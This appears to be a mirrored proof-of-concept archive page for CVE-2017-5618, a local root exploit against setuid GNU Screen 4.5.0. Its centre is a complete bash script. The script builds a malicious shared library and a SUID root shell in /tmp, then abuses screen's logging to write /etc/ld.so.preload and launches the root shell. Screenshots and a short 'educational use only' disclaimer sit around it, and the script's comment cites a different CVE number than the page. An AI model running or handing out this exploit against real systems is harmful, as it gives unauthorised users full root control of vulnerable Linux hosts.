Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-5618 PoC — GNU Screen 权限许可和访问控制问题漏洞

Source
https://github.com/RXDarkee/CVE-2017-5618-Screen-4.5.0-Root
Associated Vulnerability
Title:GNU Screen 权限许可和访问控制问题漏洞 (CVE-2017-5618)
Description:GNU screen before 4.5.1 allows local users to modify arbitrary files and consequently gain root privileges by leveraging improper checking of logfile permissions.
Description
Local privilege escalation exploit for GNU Screen 4.5.0 (CVE-2017-5618). Exploits a vulnerability in the logging feature to hijack shared library loading and gain root access via ld.so.preload manipulation.  Vulnerable: Screen 4.5.0 (SUID) Fixed in: Screen 4.6.0+
Readme
### GNU Screen 4.5.0 Local Privilege Escalation Exploit (CVE-2017-5618)

## 📌 Overview
Local privilege escalation exploit for GNU Screen 4.5.0 that hijacks shared library loading to gain **root access** via `ld.so.preload` manipulation.


## 🔧 Technical Details

Vulnerability: CVE-2017-5618

Type: Shared Library Hijacking via ld.so.preload

Affected: GNU Screen 4.5.0 exclusively

Fixed in: GNU Screen 4.6.0+



## 🎪 The Vulnerability Circus


CVE: 2017-5618 🎯

***The Bug: Screen 4.5.0 creates log files with DANGEROUS permissions***

***The Magic: We trick it into creating /etc/ld.so.preload that loads our malicious library***

***The Payload: Instant root shell! 🐚***



## Script 🗒️

```bash
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            
```
## Screenshots

> Checking Vulnerable Screen Version.

![Screen version detected](images/screen.png)


> Creating The File And Giving Required Permissions.

![Making](images/making.png)


> Root Access Gained.

![Root](images/root.png)

> Root shell achieved - full system control

## ⚠️ Warning Label


FOR EDUCATIONAL USE ONLY! ⚠️
Don't be a script kiddie - use this only on systems you own or have explicit permission to test.

## Tested On
 TryHackMe KOTH Room - Food
File Snapshot

 [4.0K]  /data/pocs/773e292b5d31338559b4b380abe6dbb2eb1a3acc
├── [4.0K]  images
│   ├── [ 65K]  making.png
│   ├── [ 52K]  root.png
│   ├── [ 58K]  screen.png
│   └── [   2]  SUP
├── [ 34K]  LICENSE
└── [2.2K]  README.md

2 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →